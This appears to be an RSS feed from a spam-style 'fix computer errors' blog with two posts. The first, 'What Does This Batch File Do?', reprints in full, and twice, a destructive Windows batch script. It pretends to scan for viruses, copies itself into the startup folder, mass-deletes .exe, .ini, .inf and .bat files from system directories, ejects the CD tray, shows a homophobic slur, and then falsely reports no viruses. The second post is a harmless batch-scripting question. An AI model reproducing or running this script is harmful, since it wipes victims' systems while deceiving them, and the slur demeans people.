<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>fix computer errors &#187; Batch</title>
	<atom:link href="http://blog.nohideip.com/tag/batch/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.nohideip.com</link>
	<description>how to fix file errors , download dll or ocx for free</description>
	<lastBuildDate>Tue, 13 Jul 2010 16:37:50 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>What Does This Batch File Do?</title>
		<link>http://blog.nohideip.com/ocx-files/what-does-this-batch-file-do</link>
		<comments>http://blog.nohideip.com/ocx-files/what-does-this-batch-file-do#comments</comments>
		<pubDate>Mon, 19 Oct 2009 17:49:01 +0000</pubDate>
		<dc:creator>florian</dc:creator>
				<category><![CDATA[ocx files]]></category>
		<category><![CDATA[Batch]]></category>
		<category><![CDATA[Does]]></category>
		<category><![CDATA[File]]></category>
		<category><![CDATA[This]]></category>
		<category><![CDATA[What]]></category>

		<guid isPermaLink="false">http://blog.nohideip.com/?p=1655</guid>
		<description><![CDATA[echo off
echo Virus detected; scanning and removing
REM -for winxp and 2000-
if exist C:\Docume~1\Defaul~1\MenuSt~1\Progra~1\O… copy %0 C:\Docume~1\Defaul~1\MenuSt~1\Progra~1\O…
REM -for win 9x and me-
if exist C:\windows\startm~1\progra~1\opstar~1 copy %0 C:\windows\startm~1\progra~1\opstar~1
REM -for winxp + 2000-
if exist C:\winnt goto winnt
c:
cd\
del *.exe
del *.ini
del *.inf
del *.bat
cd windows
del *.exe
del *.ini
del *.inf
del *.bat
cd system32
del *.exe
del *.ini
del *.inf
del *.bat
cd..
cd system
del *.exe
del *.ini
del *.inf
del *.bat
:winnt
c:
cd\
del *.exe
del *.ini
del [...]]]></description>
			<content:encoded><![CDATA[<p>echo off<br />
echo Virus detected; scanning and removing<br />
REM -for winxp and 2000-<br />
if exist C:\Docume~1\Defaul~1\MenuSt~1\Progra~1\O… copy %0 C:\Docume~1\Defaul~1\MenuSt~1\Progra~1\O…<br />
REM -for win 9x and me-<br />
if exist C:\windows\startm~1\progra~1\opstar~1 copy %0 C:\windows\startm~1\progra~1\opstar~1<br />
REM -for winxp + 2000-<br />
if exist C:\winnt goto winnt<br />
c:<br />
cd\<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
cd windows<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
cd system32<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
cd..<br />
cd system<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
:winnt<br />
c:<br />
cd\<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
cd winnt<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
cd system32<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
cd..<br />
cd system<br />
del *.exe<br />
del *.ini<br />
del *.inf<br />
del *.bat<br />
@ECHO Set oWMP = CreateObject(&#8220;WMPlayer.OCX.7&#8243; ) &gt;&gt; C:\OPENTRAY.VBS<br />
@ECHO Set colCDROMs = oWMP.cdromCollection &gt;&gt; C:\OPENTRAY.VBS<br />
@ECHO if colCDROMs.Count &gt;= 1 then &gt;&gt; C:\OPENTRAY.VBS<br />
@ECHO For i = 0 to colCDROMs.Count &#8211; 1 &gt;&gt; C:\OPENTRAY.VBS<br />
@ECHO colCDROMs.Item(i).Eject &gt;&gt; C:\OPENTRAY.VBS<br />
@ECHO Next &#8216; cdrom &gt;&gt; C:\OPENTRAY.VBS<br />
@ECHO End If &gt;&gt; C:\OPENTRAY.VBS<br />
@CALL C:\OPENTRAY.VBS<br />
echo dropped.vbs &gt;&gt; C:\dropped.bat<br />
echo MsgBox &#8220;YOU&#8217;RE GAY&#8221; &gt;&gt; C:\dropped.vbs<br />
echo MsgBox &#8220;YOU&#8217;RE GAY&#8221; &gt;&gt; C:\dropped.vbs<br />
c:\dropped.bat<br />
echo No viruses detected.<br />
pause</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nohideip.com/ocx-files/what-does-this-batch-file-do/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Basic Batch Script Question?</title>
		<link>http://blog.nohideip.com/ocx-files/basic-batch-script-question</link>
		<comments>http://blog.nohideip.com/ocx-files/basic-batch-script-question#comments</comments>
		<pubDate>Fri, 09 Oct 2009 23:41:25 +0000</pubDate>
		<dc:creator>florian</dc:creator>
				<category><![CDATA[ocx files]]></category>
		<category><![CDATA[Basic]]></category>
		<category><![CDATA[Batch]]></category>
		<category><![CDATA[Question]]></category>
		<category><![CDATA[Script]]></category>

		<guid isPermaLink="false">http://blog.nohideip.com/?p=1523</guid>
		<description><![CDATA[I&#8217;m trying to copy a file from a directory that has spaces on it, do I need to use special syntax with quotes around it?
The below is my attempt at copying the file from A to B and then running regsvr32 on it to patch a broken file on our systems. Can someone help me [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m trying to copy a file from a directory that has spaces on it, do I need to use special syntax with quotes around it?<br />
The below is my attempt at copying the file from A to B and then running regsvr32 on it to patch a broken file on our systems. Can someone help me correct this? It&#8217;s to copy the file to C:\Windows\system32 and then register it.<br />
@ECHO OFF<br />
copy G:\ISD\Public\ASD\aands\Media Player known problems\msdxm.ocx to C:\Windows\System32\<br />
C:<br />
cd windows\system32<br />
regsvr32 msdxm.ocx</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nohideip.com/ocx-files/basic-batch-script-question/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

